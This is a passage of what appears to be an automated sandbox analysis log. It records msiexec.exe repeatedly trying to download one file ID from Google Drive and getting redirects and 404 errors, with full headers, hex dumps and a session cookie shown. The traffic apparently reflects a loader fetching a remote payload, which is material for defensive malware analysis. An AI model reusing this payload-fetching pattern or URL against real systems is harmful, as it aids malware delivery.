                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.949989142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:02 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:02 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS3ZLSNlNlnKfl0pjGD_qC3CfrXse2RqnidZDa8kmV5d0x1Yfuu2ss7FuK8M6kgXSyEVd3MCqE
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:02 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-Zplys3F-QrkR2Tf1UlJkmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6f 4b 55 43 33 75 4f 4d 71 68 52 6c 6d 59 31 58 59 46 2d 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AoKUC3uOMqhRlmY1XYF-NQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.949990142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:03 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:04 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:04 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-w1o3PJ1dKjVCXRmk7vemNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.949991142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:04 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:05 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgR9CQUydRt0yrdvPr5FWKHkGSR-GLWkQ89J8Ox8wmvEcIMAmS9s4_6AaY1uJOz64NiuWda9PEw
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:05 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-OIFR1feHDQyeBLkAQrC_uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 33 55 31 49 56 79 76 36 51 68 59 4e 53 59 48 34 61 5a 67 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f3U1IVyv6QhYNSYH4aZgRg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.949992142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:06 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:06 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:06 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-CVh3KqEmHbqnjmiasckPpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.949993142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:07 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:07 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgQT9toTjWgdKh6DxPjXPLaj2ECBITLb7s7I90xOek1ZbmdI8EMbi7G7dDfSAU4R3-NZqVHpi_g
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:07 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-nvJWdXTtaOYcBjlTwwqBNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 69 58 69 41 30 46 76 32 46 32 4b 67 49 6c 48 32 6a 71 4b 78 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JiXiA0Fv2F2KgIlH2jqKxg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.949994142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:08 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:08 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:08 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-QmpRHxPjO8OPFvsfGJaGqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.949995142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:09 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:09 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS-uvJDef7ImA_jWm2IJT3QhTXCjFVH8CZ5oH3flFotjfaLJlugKNQMfmEO5gybj_uc
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:09 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-naeiniOfAtBuiyOcB9hG6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 69 73 36 72 57 66 77 6e 46 59 69 55 59 77 53 34 47 75 73 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ris6rWfwnFYiUYwS4Gus8g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.949996142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:10 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:11 UTC1920INHTTP/1.1 303 See Other
